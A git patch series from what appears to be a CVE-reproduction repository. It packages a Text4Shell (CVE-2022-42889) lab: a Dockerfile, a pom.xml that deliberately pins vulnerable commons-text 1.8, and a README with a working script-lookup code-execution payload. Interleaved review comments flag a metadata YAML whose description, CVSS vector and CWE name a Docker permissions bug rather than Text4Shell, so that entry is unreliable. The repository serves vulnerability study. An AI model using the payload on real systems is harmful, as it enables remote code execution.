From 600ba59d6f0dd0a80c839d90a437c75dbc0cde9a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 12:50:23 +0000 Subject: [PATCH 01/19] add cve/linux-kernel/2022/CVE-2022-42046. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/linux-kernel/2022/CVE-2022-42046 | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-42046 diff --git a/cve/linux-kernel/2022/CVE-2022-42046 b/cve/linux-kernel/2022/CVE-2022-42046 new file mode 100644 index 00000000..e69de29b -- Gitee From 4bd04b56c99a5052ab3503db8d8dda182dc58b3c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 12:51:24 +0000 Subject: [PATCH 02/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-42046?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/{CVE-2022-42046 => CVE-2022-42046/.keep} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/linux-kernel/2022/{CVE-2022-42046 => CVE-2022-42046/.keep} (100%) diff --git a/cve/linux-kernel/2022/CVE-2022-42046 b/cve/linux-kernel/2022/CVE-2022-42046/.keep similarity index 100% rename from cve/linux-kernel/2022/CVE-2022-42046 rename to cve/linux-kernel/2022/CVE-2022-42046/.keep -- Gitee From 4ea64167ccc431e4ca6eb4fd5d4909d70fce3de0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 12:58:38 +0000 Subject: [PATCH 03/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/docker/2022/.keep diff --git a/cve/docker/2022/.keep b/cve/docker/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee 
From 5ee1ddaf509e11bdb663fc55001d6866bc10717f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Fri, 7 Apr 2023 13:00:38 +0000
Subject: [PATCH 04/19] add cve-2022-42889
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 cve/docker/2022/.gitignore | 8 +++++
 cve/docker/2022/Dockerfile | 18 +++++++++++
 cve/docker/2022/README.md | 61 ++++++++++++++++++++++++++++++++++++++
 cve/docker/2022/pom.xml | 46 ++++++++++++++++++++++++++++
 4 files changed, 133 insertions(+)
 create mode 100644 cve/docker/2022/.gitignore
 create mode 100644 cve/docker/2022/Dockerfile
 create mode 100644 cve/docker/2022/README.md
 create mode 100644 cve/docker/2022/pom.xml
diff --git a/cve/docker/2022/.gitignore b/cve/docker/2022/.gitignore
new file mode 100644
index 00000000..380d1261
--- /dev/null
+++ b/cve/docker/2022/.gitignore
@@ -0,0 +1,8 @@
+bin
+target
+.classpath
+.project
+.settings
+src/main/webapp/META-INF
+.idea
+*.iml
\ No newline at end of file
diff --git a/cve/docker/2022/Dockerfile b/cve/docker/2022/Dockerfile
new file mode 100644
index 00000000..a31999b9
--- /dev/null
+++ b/cve/docker/2022/Dockerfile
@@ -0,0 +1,18 @@
+# Use an official OpenJDK runtime as a parent image
+FROM openjdk:8-jre-alpine
+
+# set shell to bash
+# source: https://stackoverflow.com/a/40944512/3128926
+RUN apk update && apk add bash
+
+# Set the working directory to /app
+WORKDIR /app
+
+# Copy the fat jar into the container at /app
+COPY /target/text4shell-poc.jar /app
+
+# Make port 8080 available to the world outside this container
+EXPOSE 8080
+
+# Run jar file when the container launches
+CMD ["java", "-jar", "text4shell-poc.jar"]
\ No newline at end of file
diff --git a/cve/docker/2022/README.md b/cve/docker/2022/README.md
new file mode 100644
index 00000000..2452d91e
--- /dev/null
+++ b/cve/docker/2022/README.md
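Review bot: The image never drops root — there is no `USER` instruction between `WORKDIR /app` and the `CMD` — so the Spring Boot app, and therefore anything the Text4Shell lookup executes through it, runs as uid 0 inside the container, which needlessly raises the impact of this lab reproduction on any shared host. Add `RUN addgroup -S app && adduser -S -G app app` after the apk step, `COPY --chown=app:app /target/text4shell-poc.jar /app`, and `USER app` immediately before `CMD` (8080 is an unprivileged port, so nothing else changes). Two smaller points in the same hunk: `RUN apk update && apk add bash` leaves the package index in the layer and bash exists only for the README's `docker exec` step, so `RUN apk add --no-cache bash` is the Alpine idiom; and `openjdk:8-jre-alpine` is, as far as I know, no longer updated upstream and is not digest-pinned here, so pin it if the reproduction is meant to stay reproducible. PATCH 13 deletes this file and PATCH 16 re-adds it byte-identical as cve/docker/2022/CVE-2022-42889/Dockerfile, so the fix belongs in that surviving copy.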
@@ -0,0 +1,61 @@ +### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) +------------- + + +1. Maven install to create the fat jar + +``` +mvn clean install +``` + +2. Docker build + +``` +docker build --tag=text4shell . +``` + +3. Docker run + +``` +docker run -p 80:8080 text4shell +``` + +4. Test the app + +``` +http://localhost/text4shell/attack?search= +``` + +5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: + +``` +${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} +``` + +http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D + +6. You can also try using `dns` or `url` prefixes. + +7. Get the container id + +``` +docker container ls +``` + +8. Get into the app + +``` +docker exec -it bash +``` + +9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): + +``` +ls /tmp/ +``` + +10. To stop the container + +``` +docker container stop +``` \ No newline at end of file diff --git a/cve/docker/2022/pom.xml b/cve/docker/2022/pom.xml new file mode 100644 index 00000000..80084258 --- /dev/null +++ b/cve/docker/2022/pom.xml @@ -0,0 +1,46 @@ + + 4.0.0 + com.levo.dockerexample + docker-java-app-example + jar + 1.0-SNAPSHOT + docker-java-app-example + http://maven.apache.org + + + UTF-8 + UTF-8 + 1.8 + com.levo.dockerexample.DockerApp + + + + org.springframework.boot + spring-boot-starter-parent + 2.1.1.RELEASE + + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.commons + commons-text + 1.8 + + + + + text4shell-poc + + + org.springframework.boot + spring-boot-maven-plugin + + + + + -- Gitee From a8d32df14d06f5e8ca7dbcc6ba2ec28de8d5c8b3 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:00:57 +0000 Subject: [PATCH 05/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/docker/2022/.keep diff --git a/cve/docker/2022/.keep b/cve/docker/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 35318928f14c2c65f607f6de4801d784df2e93b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:02:45 +0000 Subject: [PATCH 06/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/docker/2022/yaml/.keep diff --git a/cve/docker/2022/yaml/.keep b/cve/docker/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 5ead529ad14774fd09f4180c5989ff9631baa75f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:03:24 +0000 Subject: [PATCH 07/19] add cve/docker/2022/yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/docker/2022/yaml/CVE-2022-42889.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/docker/2022/yaml/CVE-2022-42889.yaml diff --git a/cve/docker/2022/yaml/CVE-2022-42889.yaml b/cve/docker/2022/yaml/CVE-2022-42889.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From a8778cf702496df5291df03e821d290b29db64b4 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Fri, 7 Apr 2023 13:04:54 +0000
Subject: [PATCH 08/19] update cve/docker/2022/yaml/CVE-2022-42889.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 cve/docker/2022/yaml/CVE-2022-42889.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
diff --git a/cve/docker/2022/yaml/CVE-2022-42889.yaml b/cve/docker/2022/yaml/CVE-2022-42889.yaml
index e69de29b..da4fb776 100644
--- a/cve/docker/2022/yaml/CVE-2022-42889.yaml
+++ b/cve/docker/2022/yaml/CVE-2022-42889.yaml
@@ -0,0 +1,21 @@
+id: CVE-2022-42889
+source:
+ https://github.com/karthikuj/cve-2022-42889-text4shell-docker
+info:
+ name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。
+ severity: medium
+ description: |
+ Docker版本20.10.15(build fd82621)易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。
+ scope-of-influence:
+ Docker 20.10.15, build fd82621
+ reference:
+ - https://www.docker.com/
+ - https://github.com/karthikuj/cve-2022-42889-text4shell-docker
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 6.8
+ cve-id: CVE-2022-42889
+ cwe-id: CWE-732
+ cnvd-id: None
+ kve-id: None
+ tags: 未授权访问
\ No newline at end of file
-- Gitee
From fc9e98e1b452a2ca51dd500d2a3d23ee7a66f45d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Fri, 7 Apr 2023 13:05:04 +0000
Subject: [PATCH 09/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/yaml/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/docker/2022/yaml/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/docker/2022/yaml/.keep
diff --git a/cve/docker/2022/yaml/.keep b/cve/docker/2022/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
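Review bot: The `name`, `description`, `scope-of-influence`, `cwe-id` and CVSS fields in this entry describe a Docker 20.10.15 insecure-permissions issue, but the `source`/`reference` URL it cites, and the pom.xml (`commons-text` 1.8) and README added earlier in this series, treat CVE-2022-42889 as the Apache Commons Text string-interpolation RCE ("Text4Shell"), so the metadata and the PoC it is filed with describe two different bugs. A lookup-driven code execution reachable from an unauthenticated request does not fit `AC:H/PR:L`, `severity: medium`, `CWE-732` or the `未授权访问` tag (NVD, as far as I recall, rates this CVE critical with an `AV:N/PR:N` vector), so the vector, score, CWE and tag should be re-derived from the advisory rather than kept. `name` should describe the affected component (Apache Commons Text as used by the application) rather than the Docker engine, and `description`/`scope-of-influence` should give the vulnerable commons-text version range from the advisory; if the Docker-permissions text was carried over from another entry's template, that is where to correct it. I am going by the files visible in this series; if the entry is deliberately about a different Docker issue, then `cve-id`, `source` and the filing path are the fields that are wrong instead.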
From 29c1e47cbc492b693ad0d3c79b062b5f66b6eff7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:05:17 +0000 Subject: [PATCH 10/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20C?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/C/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/docker/2022/C/.keep diff --git a/cve/docker/2022/C/.keep b/cve/docker/2022/C/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 33ae5dfeb1a173c90e39d654388b9ad1df9bfb65 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:05:37 +0000 Subject: [PATCH 11/19] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/docker/?= =?UTF-8?q?2022/C=20=E4=B8=BA=20cve/docker/2022/CVE-2022-42889?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/{C => CVE-2022-42889}/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/docker/2022/{C => CVE-2022-42889}/.keep (100%) diff --git a/cve/docker/2022/C/.keep b/cve/docker/2022/CVE-2022-42889/.keep similarity index 100% rename from cve/docker/2022/C/.keep rename to cve/docker/2022/CVE-2022-42889/.keep -- Gitee From 1f2cc2cb0c4d9cd9e7996cd5bad3f66c1a449953 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:05:49 +0000 Subject: [PATCH 12/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/.gitignore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/.gitignore | 8 -------- 1 file changed, 8 deletions(-) delete mode 100644 cve/docker/2022/.gitignore diff --git a/cve/docker/2022/.gitignore b/cve/docker/2022/.gitignore deleted file mode 100644 index 380d1261..00000000 --- a/cve/docker/2022/.gitignore +++ /dev/null 
@@ -1,8 +0,0 @@
-bin
-target
-.classpath
-.project
-.settings
-src/main/webapp/META-INF
-.idea
-*.iml
\ No newline at end of file
-- Gitee
From 2f5e860f7fe665f8432a08b6915f8553d18a3ae4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Fri, 7 Apr 2023 13:06:01 +0000
Subject: [PATCH 13/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/Dockerfile?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/docker/2022/Dockerfile | 18 ------------------
 1 file changed, 18 deletions(-)
 delete mode 100644 cve/docker/2022/Dockerfile
diff --git a/cve/docker/2022/Dockerfile b/cve/docker/2022/Dockerfile
deleted file mode 100644
index a31999b9..00000000
--- a/cve/docker/2022/Dockerfile
+++ /dev/null
@@ -1,18 +0,0 @@
-# Use an official OpenJDK runtime as a parent image
-FROM openjdk:8-jre-alpine
-
-# set shell to bash
-# source: https://stackoverflow.com/a/40944512/3128926
-RUN apk update && apk add bash
-
-# Set the working directory to /app
-WORKDIR /app
-
-# Copy the fat jar into the container at /app
-COPY /target/text4shell-poc.jar /app
-
-# Make port 8080 available to the world outside this container
-EXPOSE 8080
-
-# Run jar file when the container launches
-CMD ["java", "-jar", "text4shell-poc.jar"]
\ No newline at end of file
-- Gitee
From 780b866945c64d96c4b7ac95460bec9be199d111 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Fri, 7 Apr 2023 13:06:06 +0000
Subject: [PATCH 14/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/README.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/docker/2022/README.md | 61 ---------------------------------------
 1 file changed, 61 deletions(-)
 delete mode 100644 cve/docker/2022/README.md
diff --git a/cve/docker/2022/README.md b/cve/docker/2022/README.md deleted file mode 100644 index 2452d91e..00000000 --- a/cve/docker/2022/README.md +++ /dev/null @@ -1,61 +0,0 @@ -### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) -------------- - - -1. Maven install to create the fat jar - -``` -mvn clean install -``` - -2. Docker build - -``` -docker build --tag=text4shell . -``` - -3. Docker run - -``` -docker run -p 80:8080 text4shell -``` - -4. Test the app - -``` -http://localhost/text4shell/attack?search= -``` - -5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: - -``` -${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} -``` - -http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D - -6. You can also try using `dns` or `url` prefixes. - -7. Get the container id - -``` -docker container ls -``` - -8. Get into the app - -``` -docker exec -it bash -``` - -9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): - -``` -ls /tmp/ -``` - -10. To stop the container - -``` -docker container stop -``` \ No newline at end of file -- Gitee From 45a30070da9b8d3a75dc0badbf84e2b0b6adfafd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:06:12 +0000 Subject: [PATCH 15/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/pom.xml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/pom.xml | 46 ----------------------------------------- 1 file changed, 46 deletions(-) delete mode 100644 cve/docker/2022/pom.xml diff --git a/cve/docker/2022/pom.xml b/cve/docker/2022/pom.xml deleted file mode 100644 index 80084258..00000000 
--- a/cve/docker/2022/pom.xml +++ /dev/null @@ -1,46 +0,0 @@ - - 4.0.0 - com.levo.dockerexample - docker-java-app-example - jar - 1.0-SNAPSHOT - docker-java-app-example - http://maven.apache.org - - - UTF-8 - UTF-8 - 1.8 - com.levo.dockerexample.DockerApp - - - - org.springframework.boot - spring-boot-starter-parent - 2.1.1.RELEASE - - - - - org.springframework.boot - spring-boot-starter-web - - - org.apache.commons - commons-text - 1.8 - - - - - text4shell-poc - - - org.springframework.boot - spring-boot-maven-plugin - - - - - -- Gitee From a6f2d82749efb4bb20a357ec7bf8ba8308020d74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:06:32 +0000 Subject: [PATCH 16/19] add cve-2022-42889 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/docker/2022/CVE-2022-42889/.gitignore | 8 +++ cve/docker/2022/CVE-2022-42889/Dockerfile | 18 +++++++ cve/docker/2022/CVE-2022-42889/README.md | 61 +++++++++++++++++++++++ cve/docker/2022/CVE-2022-42889/pom.xml | 46 +++++++++++++++++ 4 files changed, 133 insertions(+) create mode 100644 cve/docker/2022/CVE-2022-42889/.gitignore create mode 100644 cve/docker/2022/CVE-2022-42889/Dockerfile create mode 100644 cve/docker/2022/CVE-2022-42889/README.md create mode 100644 cve/docker/2022/CVE-2022-42889/pom.xml diff --git a/cve/docker/2022/CVE-2022-42889/.gitignore b/cve/docker/2022/CVE-2022-42889/.gitignore new file mode 100644 index 00000000..380d1261 --- /dev/null +++ b/cve/docker/2022/CVE-2022-42889/.gitignore @@ -0,0 +1,8 @@ +bin +target +.classpath +.project +.settings +src/main/webapp/META-INF +.idea +*.iml \ No newline at end of file diff --git a/cve/docker/2022/CVE-2022-42889/Dockerfile b/cve/docker/2022/CVE-2022-42889/Dockerfile new file mode 100644 index 00000000..a31999b9 --- /dev/null +++ b/cve/docker/2022/CVE-2022-42889/Dockerfile 
@@ -0,0 +1,18 @@
+# Use an official OpenJDK runtime as a parent image
+FROM openjdk:8-jre-alpine
+
+# set shell to bash
+# source: https://stackoverflow.com/a/40944512/3128926
+RUN apk update && apk add bash
+
+# Set the working directory to /app
+WORKDIR /app
+
+# Copy the fat jar into the container at /app
+COPY /target/text4shell-poc.jar /app
+
+# Make port 8080 available to the world outside this container
+EXPOSE 8080
+
+# Run jar file when the container launches
+CMD ["java", "-jar", "text4shell-poc.jar"]
\ No newline at end of file
diff --git a/cve/docker/2022/CVE-2022-42889/README.md b/cve/docker/2022/CVE-2022-42889/README.md
new file mode 100644
index 00000000..2452d91e
--- /dev/null
+++ b/cve/docker/2022/CVE-2022-42889/README.md
@@ -0,0 +1,61 @@
+### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu)
+-------------
+
+
+1. Maven install to create the fat jar
+
+```
+mvn clean install
+```
+
+2. Docker build
+
+```
+docker build --tag=text4shell .
+```
+
+3. Docker run
+
+```
+docker run -p 80:8080 text4shell
+```
+
+4. Test the app
+
+```
+http://localhost/text4shell/attack?search=
+```
+
+5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
+
+```
+${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
+```
+
+http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
+
+6. You can also try using `dns` or `url` prefixes.
+
+7. Get the container id
+
+```
+docker container ls
+```
+
+8. Get into the app
+
+```
+docker exec -it bash
+```
+
+9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):
+
+```
+ls /tmp/
+```
+
+10. To stop the container
+
+```
+docker container stop
+```
\ No newline at end of file
diff --git a/cve/docker/2022/CVE-2022-42889/pom.xml b/cve/docker/2022/CVE-2022-42889/pom.xml new file mode 100644 index 00000000..80084258 --- /dev/null +++ b/cve/docker/2022/CVE-2022-42889/pom.xml @@ -0,0 +1,46 @@ + + 4.0.0 + com.levo.dockerexample + docker-java-app-example + jar + 1.0-SNAPSHOT + docker-java-app-example + http://maven.apache.org + + + UTF-8 + UTF-8 + 1.8 + com.levo.dockerexample.DockerApp + + + + org.springframework.boot + spring-boot-starter-parent + 2.1.1.RELEASE + + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.commons + commons-text + 1.8 + + + + + text4shell-poc + + + org.springframework.boot + spring-boot-maven-plugin + + + + + -- Gitee From fd35c529abfdfd2bd13d154cf4b940945cab87bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:06:37 +0000 Subject: [PATCH 17/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/docker/2022/CVE-2022-42889/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/CVE-2022-42889/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/docker/2022/CVE-2022-42889/.keep diff --git a/cve/docker/2022/CVE-2022-42889/.keep b/cve/docker/2022/CVE-2022-42889/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 63c77171e26684270ee5541cdf633698c1a9a326 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Fri, 7 Apr 2023 13:07:00 +0000 Subject: [PATCH 18/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2022/CVE-2022-42046?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-42046/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-42046/.keep 
diff --git a/cve/linux-kernel/2022/CVE-2022-42046/.keep b/cve/linux-kernel/2022/CVE-2022-42046/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 6e4bf2bacf21347f991aa5436b525be5fb8d1b29 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Fri, 7 Apr 2023 13:08:11 +0000
Subject: [PATCH 19/19] update other_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 other_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/other_list.yaml b/other_list.yaml
index c9f163e3..84f8b63e 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -22,6 +22,7 @@ cve:
 - CVE-2019-6447
 docker:
 - CVE-2019-5736
+ - CVE-2022-42889
 - CVE-2023-37708
 samba:
 - CVE-2021-44142
-- Gitee
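Review bot: The new line files CVE-2022-42889 under the `docker:` key next to `CVE-2019-5736` (the runc container-breakout bug), but the rest of this series shows it is an Apache Commons Text library vulnerability that is merely packaged as a Docker image; if `docker:` means "affects Docker" rather than "reproduced with Docker", the entry — and the cve/docker/2022/CVE-2022-42889 directory it points at — belong under the affected library's key. Whichever meaning the list uses, it should agree with the entry's yaml, whose `name`/`description` currently describe a Docker engine issue while its `source` describes Text4Shell.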